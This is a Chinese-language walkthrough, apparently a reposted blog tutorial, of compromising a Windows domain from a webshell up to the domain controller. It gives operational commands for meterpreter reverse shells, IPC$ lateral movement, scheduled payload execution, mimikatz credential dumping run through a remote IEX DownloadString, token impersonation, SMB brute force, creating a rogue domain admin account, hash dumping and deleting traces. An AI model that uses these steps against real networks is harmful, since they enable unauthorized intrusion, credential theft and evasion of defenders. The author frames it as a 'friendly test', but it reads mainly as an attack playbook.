• 一次完整的从webshell到域控的探索之路


    前言

    内网渗透测试资料基本上都是很多大牛的文章告诉我们思路如何,但是对于我等小菜一直是云里雾里。

    于是使用什么样的工具才内网才能畅通无阻,成了大家一直以来的渴求。

    cmd1

    今天小菜我本着所有师傅们无私分享的精神,特将三年内求师傅,求妹子,求神器所得,经过整理后,关键的知识点写出来。

    相关知识点总结如下:

    • 免杀 payload 的生成,请使用 Veil
    • msf 在 meterpreter 下的提权尝试
    • msf 在 meterpreter 下的 bypassuac 尝试
    • 内网渗透测试过程中的信息关联
    • meterpreter 的路由添加以及相关扫描
    • Powershell 在 meterpreter 下面的使用
    • Meterpreter 的 post 模块使用
    • Msf 的 custom 自己生成的 payload 的使用
    • 进程注入窃取令牌

    其实重点不在于知识的多少,大家只需关注比较重要的连接点。

    分享为了方便大家以后在安全脉搏一起交流,一起学习,一起进步(一起Zhuangbility)。

    首先 shell 是别人给我的,也不是这里介绍的重点,所以在此忽略。

    渗透测试的环境详细如下:

    • A 堡垒机(webshell 所在机器):windows server 2012
    • B 堡垒机:windows 2008(powershell 扫描机器)
    • C 堡垒机:有域管理进程的机器 windows server 2012
    • D 堡垒机若干

    第一步 反弹 meterpreter

    其实每一次的渗透测试开始并不像我们想象的那么顺利,而这一次的开始也同样意味着

    我们一次不同的旅程,整个的渗透测试过程我花了差不多四个小时的时间,大部分的时间都是花在解决这些问题之上。

    1 webshell 无法上传 exe

    本来想着直接上传 meterpreter 的 payload 的直接反弹的结果发现上传不了,可以选择 powershell 的 meterpreter 的模块来实现

    2 meterpreter 的 reverse_tcp 模块反弹不成功

    Msf 的 payload 的反弹,刚开始我使用的模块是 meterpreter 的 reverse_tcp 的模块来尝试,发现可以反弹,但是一直无法建立成功 meterpreter

    说明一定有监控发现了我们的行为。于是在此基础上尝试 meterpreter 的 reverse_https 模块,顺利反弹成功

    详细遇到的问题和解决过程的图如下所示:

    domain1

    图 1-1 使用 payload

    domain2

    domain3

    图 1-2 设置 https 的 payload

    domain4

    图 1-3 反弹成功

    第二步 尝试提权 windows server 2012

    当我们首先拿到一个 (权限不足的)Webshell 的时候想到的第一件事是什么?那肯定是提权,我也想大家想的一样,首先开始了我们的提权之旅。

    首先使用 msf 的 search 模块 ms15,会得到一些漏洞利用的模块。我尝试了 ms15_05 以及 ms15_078 全部以失败结束。

    详细的图如下所示:

    domain5

    图 2-1 提权尝试失败

    第三步 尝试当前账号 Bypassuac 测试

    刚开始一直忘说了一件事,那就是 webshell 本身的权限,我们目前 webshell是 jsp 的,具有当前的一个普通域用户的权限。

    我于是也想到了是不是可以通过bypassuac 来完成提权呢,但是测试的结果可想而知,又一次失败了。

    目前详细的情况如下:

    domain6

    图 3-1 当前的用户权限

    domain7

    图 3-2 bypassuac 尝试

    第四步 相关信息收集

    当我们此时提权不成功的情况下,我们还是可以利用当前的用户进行域渗透测试的。那

    么目前我们具有以下几种方式进行渗透测试域:

    1 收集域里面的相关信息,包括所有的用户,所有的电脑,以及相关关键的组的信息。

    常使用到的命令如下:

    net user /domain
    
    Net group "domain computers" /domain
    
    net group "domain admins"  /domain #查看域管理员
    
    net localgroup administrators
    
    net view /domain
    

    2 收集 sqlserver 的相关信息,如果当前堡垒机使用了 sql server 的话,恰巧用户是当前的域用户的话,我们在此可以使用 sqlcmd 的信息收集,以及扫描攻击。

    在这里只是提到,因为篇幅问题,暂时不做深一层讨论

    根据我的渗透测试经验,我在此只是做了最简单的信息收集,首先使用 sqlcmd 的获取sql server 的所有机器列表、当前堡垒机的机器名、当前堡垒机的 IP、

    还有 net view 来做简单的信息收集。

    详细的图如下所示:

    domain8

    图 4-1 SQLCMD 获取信息

    domain9

    图 4-2 当前的机器名

    domain10

    图 4-3 net view 相关的机器名

    第五步 信息分析,成功获取一台服务器权限

    当我们信息收集完成以后,我们要开始考虑接下来要做什么。

    首先我们来看一下我们目前拥有什么:

    • A 一个域用户的进程权限,当前堡垒机是 windows server 2012,提权失败。(假如能提权成功,我们依然是无法获取到用户的明文密码)
    • B 当前的堡垒机的用户名
    • C 当前 sqlcmd 获取到的同样安装了 sql server 机器的名称

    目前我们的思路有:

    • 1 使用 meterpreter的目前权限来添加路由进行弱口令扫描
    • 2 使用 powershell 对内网进行扫描(本次渗透测试使用了,但是在这里暂时没有使用),具体来说时间比较慢一点,当然此时此刻powershell 绝对算是一个内网渗透测试又一神器
    • 3 使用当前的用户权限架设 socks4a,然后利用第一步我们获取到的信息 socks 进行内网扫描
    • 4 使用当前用户的权限,对域里面的电脑进行 IPC,或者 DIR 溢出(也就是 dir 其他电脑的 c 盘,如果成功表示有权限)批量测试

    通过上面的分析,此时我选择了最偷懒的一种方法,进行当前堡垒机的机器名和 net view 的机器名进行对比,找出来非常相似的几个机器名,手动测试。

    当前速度也是非常快的,在尝试了两次的时候就成功了。

    详细过程如下:

    Net use \ipc$

    Tasklist /v /s ip

    domain11

    图 5-1 net use 测试成功

    domain12

    图 5-2 tasklist 执行成功

    第六步 域信息收集

    首先在第四步已经说了域相关的信息收集,这里就不做过多的介绍了,这次是在第五步的基础上做的相关收集,相关知识点如下:

    1 域信息收集,其中用到的命令如下:

    Net group "domain admins" /domain
    
    Net group /domain
    
    Net group "domain controllers" /domain
    
    Net group "enterprise admins" /domain
    
    

    2 ipc$入侵,大家相关的话自行百度经典 IPC$入侵

    Net use \ipc$

    Copy bat.bat \ipc$ (其中 bat.bat 是 powershell 的 meterpreter)

    Net time \ip

    At \ip time c:at.bat

    3 上传抓明文工具 64.exe(mimikatz 神器),大家都懂的

    Upload /home/64.exe c:

    Shell

    Cd 

    64.Exe

    4 查看抓取到的用户的详细信息

    Net use xxx /domain

    5 使用 meterpreter 的 ps,查看相关用户的进程列表

    6 尝试使用域令牌假冒

    Use incongnito

    list_token -u

    Impersonate_token xxxxxx

    我在这次渗透测试过程中尝试上面讲到的所有知识点,详细的截图如下:

    domain13

    图 6-1 查看域管

    domain14

    图 6-2 查看域组

    domain16

    图 6-3 查看域控制器

    domain15

    图 6-4 查看企业管理组

    domain17

    图 6-5 共享 copy 数据

    domain18

    图 6-6 经典 ipc$

    domain19

    图 6-7 反弹 meterpreter 成功

    domain20

    图 6-8 上传文件

    domain21

    图 6-9 查看服务器信息

    domain22

    图 6-10 抓取密码

    domain23

    图 6-11 查看域用户权限

    domain24

    图 6-12 查看域用户权限

    domain25

    图 6-13 窃取令牌尝试

    domain26

    图 6-14 查看主域控的 IP

    第七步 SMB 快速扩张控制权限

    此时此刻,作为读者你的在想什么呢?是不是当看到第六步的时候就可以去睡觉了,毕竟已经凌晨五点了。

    但是此时此刻作为一个专业求师傅,求妹子,求神器的人可不这么想。

    我们要做最后的冲刺,因为黎明的钟声已经敲响。

    先来看一下我们当前拥有什么权限:

    有两台堡垒机,两个用户权限

    目前我们要做的事情很简单,就是快速的在内网扩大控制权限,那么如何去做,其实很简单的,就是快速的扫描以完成我们的梦想。

    具体如下:

    • 1 使用当前获取到的两个用户权限,快速的进行扫描。(扫描哪里了,看到第六步最后一张图 6-14 了没,就是域控的 IP 段)
    • 2 smb_login 扫描
    • 3 端口转发进内网

    目前思路我们已经有了,神器 msf 终于迎来了自己梦想恶天堂。让我们愉快的玩耍吧。

    详细知识点如下:

    • 1 msf 添加路由 route add ip mask sessionid
    • 2 smb_login 模块或者使用 psexec_scanner(这个模块需要你自己搜索一下)
    • 3 meterpreter 端口转发
    • 4 msf 的 socks4a 模块(这次渗透测试没使用到,但是并不代表它不美好)

    domain27

    图 7-1 设置 smb_login 的参数

    domain28

    图 7-2 爆破成功的机器

    domain29

    图 7-3 查看已经获取到的权限

    domain30

    图 7-4 端口转发和目前拥有的权限

    第八步 Powershell 获取域控管理员在线的机器

    内网渗透测试不得不说到两大神器:msf 和 powershell,但是看大家基本上都是分开来使用的,或者说大家在一次渗透测试的过程中很少遇到,今天作为读者的你有福了。

    首先来讲讲 powershell 的在内网渗透测试中不仅能扫,能爆,能转发,当然还能做更多的事情,

    一般使用到的模块有下面三个:

    • 1 Empire 据说是神器,也确实是神器,我没使用过,暂时不多说
    • 2 PowerUp 据说提权神器,也确实是神器,我很少使用。也暂时不多说
    • 3 PowerView 据说是域渗透神器,也确实是神器,我一直用,非常漂亮

    来说说 powershell 的使用,其实也很简单,只是大家在用的过程中一般没有太多的注意,

    主要有三种方式来调用:

    1 当然是下载到本地执行,详细使用方法如后面连接:powershell "IEX (New-ObjectNet.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"

    2 第二种方式是把 powershell 文件上传到堡垒机本地执行, powershell.exe -exec bypass -Command "& {Import-Module .powerview.ps1; Invoke-UserHunter}"

    3 上传到对方本地,然后 Import-Module 导入,使用PowerView 的所有模块使用其实很简单,直接调用方法,大家看看下面的图就知道了。

    如果你能看到这里开始你的 powershell 之旅,内网将开始变得简单。

    domain31

    图 8-1 powerview 的相关方法

    废话讲了这么多,下面开始我们的实战,其实很简单,我真的想说很简单,简单到一句话搞定。

    Powerview 中的 Invoke-UserHunter 是获取当前域管理员在线登录的机器。

    这次的旅程我们就用它来完成进一步的信息获取。详细如下图:

    domain32

    图 8-1 powershell 执行命令

    domain33

    图 8-2 powerview 的效果展示

    第九步 域控管理员权限的获取(windows2012 权限)

    在经过第八步之后,身为读者的你是不是感觉这次收获有一点点,内网域渗透测试再也不是那么一筹莫展了呢。

    神器过后还是神器,又见它 windows server 2012,虽然域管理在线,但是我们的抓密码神器阳痿了,总不能修改注册表,等管理员再次登录吧。

    目前来看看我们遇到的问题,通过 powershell 成功获取到相关的域控管理员在线的一台机器 windows server 2012,并且用这台机器的权限,那么接下来我们去搞定域控。

    思路如下:

    • 1 修改注册表等待域控管理员再次登录来抓取(黄花菜都会凉的)
    • 2 通过 PowerUp 的进程来注入获取域权限(没使用过暂时放弃),当然此处也可以写类似外挂的功能注入进程获取权限
    • 3 msf 的令牌窃取功能(这个可以很容易实现)

    知道思路,那么接下来就开始我们愉快的旅程吧。我要求师傅,求妹子,求神器,专业求到域控去:

    1 同样使用 ipc 经典入侵手法,反弹 meterpreter,

    Getsysttem 权限

    Ps 查看域管理所在的进程

    Migrate pid 注入进程

    2 继续经典的 IPC$到域控

    Meterpreter 下面 shell

    Net use \域控 ipc$

    Net time \域控 ip

    Copy bat.bat \域控 ipc$

    At \域控 ip time c:at.bat(意料之外的错误,提示 schtasks.exe,不熟){安全脉搏小编注:08及以上at命令就废弃啦,都用schtasks定时计划任务}

    3 通往成功的路不只有一条,添加域管账户

    Net user demo demo /ad /domain

    Net group "domain admins" demo /ad /domain

    到了此刻,我们已经拥有域管权限了。

    详细的截图如下:

    domain34

    图 9-1 注入域管进程,连接域控

    domain35

    图 9-2 添加域管理账号

    domain36

    图 9-3 查看域管理是否成功

    第十步 域控我来了(msf psexec 反弹 shell)

    一看时间,凌晨七点了,早上的太阳要升起来了。此时此刻你的心情是怎么样呢。该晨起跑步了吧。东方的太阳就要升起了,域控的权限也终于到了了。

    先讲思路,登录域控其实有很多方式的,下面我说一下我能知道的几种吧,相信大家也大家也都知道的:

    • 1 端口转发或者 socks 登录域控远程桌面
    • 2 登录对方内网的一台电脑使用 psexec 来反弹 shell
    • 3 使用 msf 的 psexec 反弹 meterpreter

    反弹需要注意要用到的知识,我们这里采用的是 psesexc 来反弹 meterpreter,其中涉及到的知识如下:

    • 1 msf 中 psexec 模块的使用
    • 2 custom 模块的使用,配合 meterpreter,在 payload 不免杀的情况下如何使用自己 Veil生成的 payload

    详细的使用过程如下图:

    domain37

    图 10-1 psexec 执行测试

    domain38

    图 10-2 psexec 默认反弹不成功

    domain39

    图 10-3 meterpreter 的 https 模块反弹成功

    domain40

    图 10-4 域控的系统信息

    第十一步 Meterpreter 获取所有用户的 hash

    有了域的权限之后,如果我们还想进行深层次的控制,那么 dumphash 是必不可少的。

    首先来看看我们需要的知识:

    • 1 msf 有两个模块可以使用,一个是 hashdump,此模块只能导出本地的 hash,大家测试就可以知道了,另外一个是 smart_hashdump,此模块可以用来导出域用户的 hash.
    • powershell 有可以直接导出的模块,大家自行尝试一下
    • 3 wce,mimikatz 等神器的使用

    在这里我采用的是 msf 的 smart_hashdump 的模块。在此需要注意的是要想使使用此模块导出 hash,必须要使用 system 的权限才行。

    详细的过程如下图:

    domain41

    图 11-1 smart_hashdump 模块的使用

    第十二步 曲折的探索之路

    这里是整理一下之前用到的一些技术,和走过的一些弯路。文档到这差不多算是完成了

    一个从 webshell 到域控的探索之路算是完成了,当然在这里我把过程中走的一些弯路还有不足点指出来,欢迎大家的指正,共同学习。

    domain42

    图 12-1 session 控制图

    根据上面的图知道,我现在控制的 Session 一共有 5 个,其中有四个是必须要获取的,分别为 session1,session2 session4,session5。

    其中 session1 为 webshell 反弹所获得,第二个session2 是信息分析获取到的,session4 为获取域管理员所获取,session5 为域。

    其中 session3就是我所走过的弯路,浪费了时间。

    之后我们必须为了更好更快速有效的完成渗透测试,平时努力练剑。尽力做到不出剑则已,出剑则见血。

    第十三步 我轻轻的来了,我又轻轻的走了,管理员,再见(清理)

    作为一次比较成功的友情测试,我们必须要做到来无影,去无踪。所以收尾工作,也将悄悄展开。

    涉及到相关的知识点:

    • 1 删除之前添加的域管理账号
    • 2 删除所有的使用过程中的工具
    • 3 删除自己所有的操作记录
    • 4 关闭所有的 meterpreter

    在此过程中我们一共上传了两个文件,一个 bar.bat,一个 64 位的 mimikatz 抓密码工具,

    直接删除即可。

    domain43

    图 13-1 删除用户

    domain44

    图 13-2 关闭所有的 session

    总结

    总结说点什么好呢。还是先喊口号吧------“求妹子,求师傅,求神器”。

    感谢三年多以来为我默默分享的师傅们,感谢妹子在我做这次友情测试的时候,她一直静静的陪在我这边,

    感谢这些年求来的各种神器,没有这些资源的支持,我将不会完成这次的友情测试。

    作为一名渗透测试爱好者,我们一直在努力的追求着心中那个美丽的梦想;

    作为一名程序员,我们就是想简单的 coding。人生如此美好,大家何不联手,一起分享美好。

    目录

    域渗透测试教程(windows server 2012)............................................................................................ 1

    前言.............................................................................................................................................  2

    第一步 反弹 meterpreter.......................................................................................................... 2

    第二步 尝试提权 windows server 2012...................................................................................  4

    第三步 尝试当前账号 Bypassuac 测试.................................................................................... 5

    第四步 相关信息收集............................................................................................................... 6

    第五步 信息分析,成功获取一台服务器权限......................................................................  8

    第六步 域信息收集................................................................................................................. 10

    第七步 SMB 快速扩张控制权限............................................................................................  16

    第八步 Powershell 获取域控管理员在线的机器....................................................................  18

    第九步 域控管理员权限的获取(windows2012 权限)..........................................................  20

    第十步 域控我来了(msf psexec 反弹 shell)........................................................................... 22

    第十一步 Meterpreter 获取所有用户的 hash....................................................................... 24

    第十二步 曲折的探索之路..................................................................................................... 25

    第十三步 我轻轻的来了,我又轻轻的走了,管理员,再见(清理).................................. 26

    总结...........................................................................................................................................  27

  • 相关阅读:
    Nginx优化
    Mysql日常操作
    YUM源
    MySQL5.7安装手册
    自律——可以让我们活的更高级
    javascript中with的用法
    js中所有函数的参数(按值和按引用)都是按值传递的,怎么理解?
    base64编码的图片在网页中显示
    form表单提交没有跨域问题,但ajax提交存在跨域问题
    移动端1px的适配问题
  • 原文地址:https://www.cnblogs.com/hookjoy/p/6579672.html
Copyright © 2020-2023  润新知